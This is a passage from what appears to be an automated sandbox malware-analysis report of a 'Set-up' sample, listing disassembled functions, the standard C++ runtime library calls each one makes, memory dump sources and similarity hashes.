                                                                                              • __EH_prolog3_catch.LIBCMT ref: 6BC2E0DE
                                                                                              • ?_Ipfx@?$basic_istream@_WU?$char_traits@_W@std@@@std@@QAE_N_N@Z.MSVCP100(00000001,?,00000014), ref: 6BC2E106
                                                                                                • Part of subcall function 6BC1DE78: __EH_prolog3_catch.LIBCMT ref: 6BC1DE7F
                                                                                                • Part of subcall function 6BC1DE78: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QAEAAV12@XZ.MSVCP100(00000008,6BC1D687,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DEA2
                                                                                                • Part of subcall function 6BC1DE78: ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000008,6BC1D687,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DEC7
                                                                                                • Part of subcall function 6BC1DE78: ?sgetc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEGXZ.MSVCP100(00000008,6BC1D687,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DEF0
                                                                                                • Part of subcall function 6BC1DE78: ?clear@ios_base@std@@QAEXH_N@Z.MSVCP100(?,00000000,?,?,?,?,?,00000014), ref: 6BC1DF19
                                                                                              • ?sputbackc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEG_W@Z.MSVCP100(?,00000001,?,00000014), ref: 6BC2E125
                                                                                              • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP100(?,00000000,00000001,?,00000014), ref: 6BC2E14C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: U?$char_traits@_W@std@@@std@@$H_prolog3_catch$?clear@ios_base@std@@?flush@?$basic_ostream@_?getloc@ios_base@std@@?setstate@?$basic_ios@_?sgetc@?$basic_streambuf@_?sputbackc@?$basic_streambuf@_Ipfx@?$basic_istream@_V12@Vlocale@2@
                                                                                              • String ID:
                                                                                              • API String ID: 985700304-0
                                                                                              • Opcode ID: 7ecbc7007f4582f62dcc0e3de10e3a17209c27c9ba54cca1808a7a4ae5698a31
                                                                                              • Instruction ID: 13ba35b398ecc523b844adbd1a9313bee10fa50dc4bfe45fef80db6ed7d3fdfd
                                                                                              • Opcode Fuzzy Hash: 7ecbc7007f4582f62dcc0e3de10e3a17209c27c9ba54cca1808a7a4ae5698a31
                                                                                              • Instruction Fuzzy Hash: F911A175A11259CFCB10CFA4C8919ADFBB1BF98304F50806DD186AB391DB388B01DBA0
                                                                                              Function 6BC2E1AD Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3_catch.LIBCMT ref: 6BC2E1B4
                                                                                              • ?_Ipfx@?$basic_istream@_WU?$char_traits@_W@std@@@std@@QAE_N_N@Z.MSVCP100(00000001,?,00000014), ref: 6BC2E1DC
                                                                                                • Part of subcall function 6BC1DE78: __EH_prolog3_catch.LIBCMT ref: 6BC1DE7F
                                                                                                • Part of subcall function 6BC1DE78: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QAEAAV12@XZ.MSVCP100(00000008,6BC1D687,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DEA2
                                                                                                • Part of subcall function 6BC1DE78: ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000008,6BC1D687,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DEC7
                                                                                                • Part of subcall function 6BC1DE78: ?sgetc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEGXZ.MSVCP100(00000008,6BC1D687,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DEF0
                                                                                                • Part of subcall function 6BC1DE78: ?clear@ios_base@std@@QAEXH_N@Z.MSVCP100(?,00000000,?,?,?,?,?,00000014), ref: 6BC1DF19
                                                                                              • ?sungetc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEGXZ.MSVCP100(00000001,?,00000014), ref: 6BC2E1F8
                                                                                              • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP100(?,00000000,00000001,?,00000014), ref: 6BC2E21F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: U?$char_traits@_W@std@@@std@@$H_prolog3_catch$?clear@ios_base@std@@?flush@?$basic_ostream@_?getloc@ios_base@std@@?setstate@?$basic_ios@_?sgetc@?$basic_streambuf@_?sungetc@?$basic_streambuf@_Ipfx@?$basic_istream@_V12@Vlocale@2@
                                                                                              • String ID:
                                                                                              • API String ID: 2983387924-0
                                                                                              • Opcode ID: 8dfa3d5578dcb065352e740edb5ec1422353b3705428c1c9def8f8ff25eae059
                                                                                              • Instruction ID: 5aef2cf00d8b39305722cc4a4c78c42dce3f42ebe994b640e5c51504c44923ff
                                                                                              • Opcode Fuzzy Hash: 8dfa3d5578dcb065352e740edb5ec1422353b3705428c1c9def8f8ff25eae059
                                                                                              • Instruction Fuzzy Hash: 4D116D74915259CFCB14CFA9C891AADFBB1BF98308F50405DD186AB391EB399B01DBA0
                                                                                              Function 6BC2C832 Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3_catch.LIBCMT ref: 6BC2C839
                                                                                              • ?_Ipfx@?$basic_istream@DU?$char_traits@D@std@@@std@@QAE_N_N@Z.MSVCP100(00000001,?,00000014), ref: 6BC2C861
                                                                                                • Part of subcall function 6BC1DC96: __EH_prolog3_catch.LIBCMT ref: 6BC1DC9D
                                                                                                • Part of subcall function 6BC1DC96: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QAEAAV12@XZ.MSVCP100(00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DCC0
                                                                                                • Part of subcall function 6BC1DC96: ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DCE1
                                                                                                • Part of subcall function 6BC1DC96: ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP100(00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DD0A
                                                                                                • Part of subcall function 6BC1DC96: ?clear@ios_base@std@@QAEXH_N@Z.MSVCP100(?,00000000,00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DD2B
                                                                                              • ?sputbackc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP100(?,00000001,?,00000014), ref: 6BC2C880
                                                                                              • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP100(?,00000000,00000001,?,00000014), ref: 6BC2C89F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: D@std@@@std@@U?$char_traits@$H_prolog3_catchU?$char_traits@_W@std@@@std@@$?clear@ios_base@std@@?flush@?$basic_ostream@_?getloc@ios_base@std@@?setstate@?$basic_ios@_?sgetc@?$basic_streambuf@?sputbackc@?$basic_streambuf@Ipfx@?$basic_istream@V12@Vlocale@2@
                                                                                              • String ID:
                                                                                              • API String ID: 2694087394-0
                                                                                              • Opcode ID: d3990d0035152351c908e6bf63a63153937b388a8627f439f82f1b10acbd66c0
                                                                                              • Instruction ID: f2cfcbeb84a9380f51f3020a6e798ac4b89e192fd0e11f6b677fd310a55f0898
                                                                                              • Opcode Fuzzy Hash: d3990d0035152351c908e6bf63a63153937b388a8627f439f82f1b10acbd66c0
                                                                                              • Instruction Fuzzy Hash: 2C118070D15248DFCB10CFA8C9919ADFBB1BF98318F10855DD196AB3A0EB399B01DB90
                                                                                              Function 6BC2C900 Relevance: 6.0, APIs: 4, Instructions: 43COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3_catch.LIBCMT ref: 6BC2C907
                                                                                              • ?_Ipfx@?$basic_istream@DU?$char_traits@D@std@@@std@@QAE_N_N@Z.MSVCP100(00000001,?,00000014), ref: 6BC2C92F
                                                                                                • Part of subcall function 6BC1DC96: __EH_prolog3_catch.LIBCMT ref: 6BC1DC9D
                                                                                                • Part of subcall function 6BC1DC96: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QAEAAV12@XZ.MSVCP100(00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DCC0
                                                                                                • Part of subcall function 6BC1DC96: ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DCE1
                                                                                                • Part of subcall function 6BC1DC96: ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP100(00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DD0A
                                                                                                • Part of subcall function 6BC1DC96: ?clear@ios_base@std@@QAEXH_N@Z.MSVCP100(?,00000000,00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DD2B
                                                                                              • ?sungetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP100(00000001,?,00000014), ref: 6BC2C94B
                                                                                              • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP100(?,00000000,00000001,?,00000014), ref: 6BC2C96A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: D@std@@@std@@U?$char_traits@$H_prolog3_catchU?$char_traits@_W@std@@@std@@$?clear@ios_base@std@@?flush@?$basic_ostream@_?getloc@ios_base@std@@?setstate@?$basic_ios@_?sgetc@?$basic_streambuf@?sungetc@?$basic_streambuf@Ipfx@?$basic_istream@V12@Vlocale@2@
                                                                                              • String ID:
                                                                                              • API String ID: 2027688421-0
                                                                                              • Opcode ID: c39a57dfdbb4a8e7eb58eb7979d1e3726bae4566607cf29259c1a94b5139975a
                                                                                              • Instruction ID: 3588b174e83042615cfd3c1e87cab4e7f3a2beeb8b933283032e224709b83b7f
                                                                                              • Opcode Fuzzy Hash: c39a57dfdbb4a8e7eb58eb7979d1e3726bae4566607cf29259c1a94b5139975a
                                                                                              • Instruction Fuzzy Hash: 93019270D15249CFCB10DFA8C9919ADFBB1BF88318F50815DD1A6A73A1D7389B01DB90
                                                                                              Function 6BC19EAE Relevance: 6.0, APIs: 4, Instructions: 40COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC19EB5
                                                                                              • ??0_NonReentrantPPLLock@details@Concurrency@@QAE@XZ.MSVCR100(00000004,6BC16E5C,?,00000000,6BC16418,?,00000008), ref: 6BC19EFB
                                                                                              • ??0_NonReentrantPPLLock@details@Concurrency@@QAE@XZ.MSVCR100 ref: 6BC19F13
                                                                                              • ??0_ReentrantPPLLock@details@Concurrency@@QAE@XZ.MSVCR100 ref: 6BC19F33
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??0_Concurrency@@Lock@details@Reentrant$H_prolog3
                                                                                              • String ID:
                                                                                              • API String ID: 62913154-0
                                                                                              • Opcode ID: 0cd602f4d5baf6b274713b0642ca2edca1f952c410149c3af0465086a5e49e96
                                                                                              • Instruction ID: fcfc2bcf7725e00b9bc31d1d82cf81162d066eb550996ebe6be089c12d3a2641
                                                                                              • Opcode Fuzzy Hash: 0cd602f4d5baf6b274713b0642ca2edca1f952c410149c3af0465086a5e49e96
                                                                                              • Instruction Fuzzy Hash: 8111D2B4801B46DFC724CF69C195289FBF0FF19310B908A6EC49A9BB40E774A654CF90
                                                                                              Function 6BC1AA18 Relevance: 6.0, APIs: 4, Instructions: 35COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC1AA1F
                                                                                                • Part of subcall function 6BC1AB2C: __EH_prolog3.LIBCMT ref: 6BC1AB33
                                                                                                • Part of subcall function 6BC1AB2C: ??0_Scoped_lock@_ReentrantPPLLock@details@Concurrency@@QAE@AAV123@@Z.MSVCR100(?,0000001C,6BC1A716,00000014,6BC1A63D,?), ref: 6BC1AB41
                                                                                                • Part of subcall function 6BC1AB2C: ?set@event@Concurrency@@QAEXXZ.MSVCR100 ref: 6BC1ABAB
                                                                                                • Part of subcall function 6BC1AB2C: ??1_Scoped_lock@_ReentrantPPLLock@details@Concurrency@@QAE@XZ.MSVCR100 ref: 6BC1ABB8
                                                                                              • ?_SpinOnce@?$_SpinWait@$00@details@Concurrency@@QAE_NXZ.MSVCR100(00000014), ref: 6BC1AA4C
                                                                                              • ??1critical_section@Concurrency@@QAE@XZ.MSVCR100 ref: 6BC1AA7A
                                                                                              • ??1event@Concurrency@@QAE@XZ.MSVCR100 ref: 6BC1AA87
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: Concurrency@@$H_prolog3Lock@details@ReentrantScoped_lock@_Spin$??0_??1_??1critical_section@??1event@?set@event@Once@?$_V123@@Wait@$00@details@
                                                                                              • String ID:
                                                                                              • API String ID: 1356037114-0
                                                                                              • Opcode ID: dfae11a6f9b35c92d7bc8ee69f43b8405d2a6f253b1fd24c965d1b4adc0f155b
                                                                                              • Instruction ID: 807c712f155e1623c60ccf6fc5669c24d76ec2a191dfa957be8ac70c2ab5f9f4
                                                                                              • Opcode Fuzzy Hash: dfae11a6f9b35c92d7bc8ee69f43b8405d2a6f253b1fd24c965d1b4adc0f155b
                                                                                              • Instruction Fuzzy Hash: 36019E34625315CFDB10CFA5C11579DBBB0BF15708F50805CE496A7640E7789708DB21
                                                                                              Function 6BC19DAD Relevance: 6.0, APIs: 4, Instructions: 35COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC19DB4
                                                                                              • ??1critical_section@Concurrency@@QAE@XZ.MSVCR100 ref: 6BC19E03
                                                                                              • ??1critical_section@Concurrency@@QAE@XZ.MSVCR100 ref: 6BC19E0F
                                                                                              • ??3@YAXPAX@Z.MSVCR100 ref: 6BC19E22
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??1critical_section@Concurrency@@$??3@H_prolog3
                                                                                              • String ID:
                                                                                              • API String ID: 441831883-0
                                                                                              • Opcode ID: 89507d57f4be0ffb0f4dd49bd3305124ff067ff258f4dd53e1bbac1b1a41c990
                                                                                              • Instruction ID: 82d76894538bb67702030384d17930e5be29df17d1c514ac8bb445003f9642fe
                                                                                              • Opcode Fuzzy Hash: 89507d57f4be0ffb0f4dd49bd3305124ff067ff258f4dd53e1bbac1b1a41c990
                                                                                              • Instruction Fuzzy Hash: 5501F274119244CBC715DF78C1467DDBBB0BF52314F10409CD4AA6B281DBB86B41EB91
                                                                                              Function 6BC2198D Relevance: 6.0, APIs: 4, Instructions: 29COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ?_Init@ios_base@std@@IAEXXZ.MSVCP100 ref: 6BC21995
                                                                                                • Part of subcall function 6BC1D26C: ?clear@ios_base@std@@QAEXH_N@Z.MSVCP100(?,?,00000000,00000000), ref: 6BC1D29C
                                                                                                • Part of subcall function 6BC1D26C: ??2@YAPAXI@Z.MSVCR100(00000004,?,?,00000000,00000000), ref: 6BC1D2A3
                                                                                                • Part of subcall function 6BC1D26C: std::locale::locale.LIBCPMT ref: 6BC1D2B0
                                                                                              • ?widen@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEDD@Z.MSVCP100(00000020), ref: 6BC219A8
                                                                                                • Part of subcall function 6BC2181B: __EH_prolog3.LIBCMT ref: 6BC21822
                                                                                                • Part of subcall function 6BC2181B: ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000004), ref: 6BC2182B
                                                                                              • ?clear@ios_base@std@@QAEXH_N@Z.MSVCP100(?,00000000), ref: 6BC219C1
                                                                                                • Part of subcall function 6BC1CD83: _CxxThrowException.MSVCR100(6BC1174C,6BC4CA2C), ref: 6BC1CDA4
                                                                                                • Part of subcall function 6BC1CD83: ?iostream_category@std@@YAABVerror_category@1@XZ.MSVCP100(6BC1174C,6BC4CA2C), ref: 6BC1CDB1
                                                                                                • Part of subcall function 6BC1CD83: ??0exception@std@@QAE@ABQBD@Z.MSVCR100(6BC12E14), ref: 6BC1CDC6
                                                                                                • Part of subcall function 6BC1CD83: ?iostream_category@std@@YAABVerror_category@1@XZ.MSVCP100 ref: 6BC1CDE8
                                                                                                • Part of subcall function 6BC1CD83: ?iostream_category@std@@YAABVerror_category@1@XZ.MSVCP100 ref: 6BC1CDF8
                                                                                              • std::ios_base::_Addstd.LIBCPMT ref: 6BC219CD
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ?iostream_category@std@@Verror_category@1@$?clear@ios_base@std@@$??0exception@std@@??2@?getloc@ios_base@std@@?widen@?$basic_ios@AddstdD@std@@@std@@ExceptionH_prolog3Init@ios_base@std@@ThrowU?$char_traits@Vlocale@2@std::ios_base::_std::locale::locale
                                                                                              • String ID:
                                                                                              • API String ID: 2357300069-0
                                                                                              • Opcode ID: 8bbc491330479dad718dbffd002b7a2e0d6bd7c9cb6c3b6a85b10d531a97a336
                                                                                              • Instruction ID: ba9d2bcadc154d7f5b07736db7ef3b1bfab5bf7918411a55e41852546fc7c54b
                                                                                              • Opcode Fuzzy Hash: 8bbc491330479dad718dbffd002b7a2e0d6bd7c9cb6c3b6a85b10d531a97a336
                                                                                              • Instruction Fuzzy Hash: 69F0E5312247606BE730A77DD482B4B7BE8AB40625F00481EE4965BA80EBBEF64087D4
                                                                                              Function 6BC268F2 Relevance: 6.0, APIs: 4, Instructions: 29COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ?_Init@ios_base@std@@IAEXXZ.MSVCP100 ref: 6BC268FA
                                                                                                • Part of subcall function 6BC1D26C: ?clear@ios_base@std@@QAEXH_N@Z.MSVCP100(?,?,00000000,00000000), ref: 6BC1D29C
                                                                                                • Part of subcall function 6BC1D26C: ??2@YAPAXI@Z.MSVCR100(00000004,?,?,00000000,00000000), ref: 6BC1D2A3
                                                                                                • Part of subcall function 6BC1D26C: std::locale::locale.LIBCPMT ref: 6BC1D2B0
                                                                                              • ?widen@?$basic_ios@GU?$char_traits@G@std@@@std@@QBEGD@Z.MSVCP100(00000020), ref: 6BC2690D
                                                                                                • Part of subcall function 6BC268AD: __EH_prolog3.LIBCMT ref: 6BC268B4
                                                                                                • Part of subcall function 6BC268AD: ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000004), ref: 6BC268BD
                                                                                              • ?clear@ios_base@std@@QAEXH_N@Z.MSVCP100(?,00000000), ref: 6BC26927
                                                                                                • Part of subcall function 6BC1CD83: _CxxThrowException.MSVCR100(6BC1174C,6BC4CA2C), ref: 6BC1CDA4
                                                                                                • Part of subcall function 6BC1CD83: ?iostream_category@std@@YAABVerror_category@1@XZ.MSVCP100(6BC1174C,6BC4CA2C), ref: 6BC1CDB1
                                                                                                • Part of subcall function 6BC1CD83: ??0exception@std@@QAE@ABQBD@Z.MSVCR100(6BC12E14), ref: 6BC1CDC6
                                                                                                • Part of subcall function 6BC1CD83: ?iostream_category@std@@YAABVerror_category@1@XZ.MSVCP100 ref: 6BC1CDE8
                                                                                                • Part of subcall function 6BC1CD83: ?iostream_category@std@@YAABVerror_category@1@XZ.MSVCP100 ref: 6BC1CDF8
                                                                                              • std::ios_base::_Addstd.LIBCPMT ref: 6BC26933
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ?iostream_category@std@@Verror_category@1@$?clear@ios_base@std@@$??0exception@std@@??2@?getloc@ios_base@std@@?widen@?$basic_ios@AddstdExceptionG@std@@@std@@H_prolog3Init@ios_base@std@@ThrowU?$char_traits@Vlocale@2@std::ios_base::_std::locale::locale
                                                                                              • String ID:
                                                                                              • API String ID: 1147172176-0
                                                                                              • Opcode ID: 4a93c5219eda027f76f056229a4862a7d4b67af2e46ccb3538d82f2904040ed6
                                                                                              • Instruction ID: 007e5d793f9dd084ae9e892e5dcf8e6544be53f0efa2f36c6826c4cf8bd7163e
                                                                                              • Opcode Fuzzy Hash: 4a93c5219eda027f76f056229a4862a7d4b67af2e46ccb3538d82f2904040ed6
                                                                                              • Instruction Fuzzy Hash: F9F0EC31224B106BD730AB758442B4777D4AF40724F00441EE4555B580EF7DF640C794
                                                                                              Function 6BC26814 Relevance: 6.0, APIs: 4, Instructions: 29COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ?_Init@ios_base@std@@IAEXXZ.MSVCP100 ref: 6BC2681C
                                                                                                • Part of subcall function 6BC1D26C: ?clear@ios_base@std@@QAEXH_N@Z.MSVCP100(?,?,00000000,00000000), ref: 6BC1D29C
                                                                                                • Part of subcall function 6BC1D26C: ??2@YAPAXI@Z.MSVCR100(00000004,?,?,00000000,00000000), ref: 6BC1D2A3
                                                                                                • Part of subcall function 6BC1D26C: std::locale::locale.LIBCPMT ref: 6BC1D2B0
                                                                                              • ?widen@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QBE_WD@Z.MSVCP100(00000020), ref: 6BC2682F
                                                                                                • Part of subcall function 6BC267AE: __EH_prolog3.LIBCMT ref: 6BC267B5
                                                                                                • Part of subcall function 6BC267AE: ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000004), ref: 6BC267BE
                                                                                              • ?clear@ios_base@std@@QAEXH_N@Z.MSVCP100(?,00000000), ref: 6BC26849
                                                                                                • Part of subcall function 6BC1CD83: _CxxThrowException.MSVCR100(6BC1174C,6BC4CA2C), ref: 6BC1CDA4
                                                                                                • Part of subcall function 6BC1CD83: ?iostream_category@std@@YAABVerror_category@1@XZ.MSVCP100(6BC1174C,6BC4CA2C), ref: 6BC1CDB1
                                                                                                • Part of subcall function 6BC1CD83: ??0exception@std@@QAE@ABQBD@Z.MSVCR100(6BC12E14), ref: 6BC1CDC6
                                                                                                • Part of subcall function 6BC1CD83: ?iostream_category@std@@YAABVerror_category@1@XZ.MSVCP100 ref: 6BC1CDE8
                                                                                                • Part of subcall function 6BC1CD83: ?iostream_category@std@@YAABVerror_category@1@XZ.MSVCP100 ref: 6BC1CDF8
                                                                                              • std::ios_base::_Addstd.LIBCPMT ref: 6BC26855
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ?iostream_category@std@@Verror_category@1@$?clear@ios_base@std@@$??0exception@std@@??2@?getloc@ios_base@std@@?widen@?$basic_ios@_AddstdExceptionH_prolog3Init@ios_base@std@@ThrowU?$char_traits@_Vlocale@2@W@std@@@std@@std::ios_base::_std::locale::locale
                                                                                              • String ID:
                                                                                              • API String ID: 408107686-0
                                                                                              • Opcode ID: 1e342b6411303b72b27934ec78aa33dac28bdab166b0d0df455a8513e2cd3bd5
                                                                                              • Instruction ID: bab57ef0f238b54e19c4c3b59d0c1208b7e138d24b20ceeff5a1ad2e383fb684
                                                                                              • Opcode Fuzzy Hash: 1e342b6411303b72b27934ec78aa33dac28bdab166b0d0df455a8513e2cd3bd5
                                                                                              • Instruction Fuzzy Hash: 59F02331624B1067D7309775C445B4777D4AF40728F00442EF0455B990EBBDF640C7E4
                                                                                              Function 6BC25B05 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC25B0C
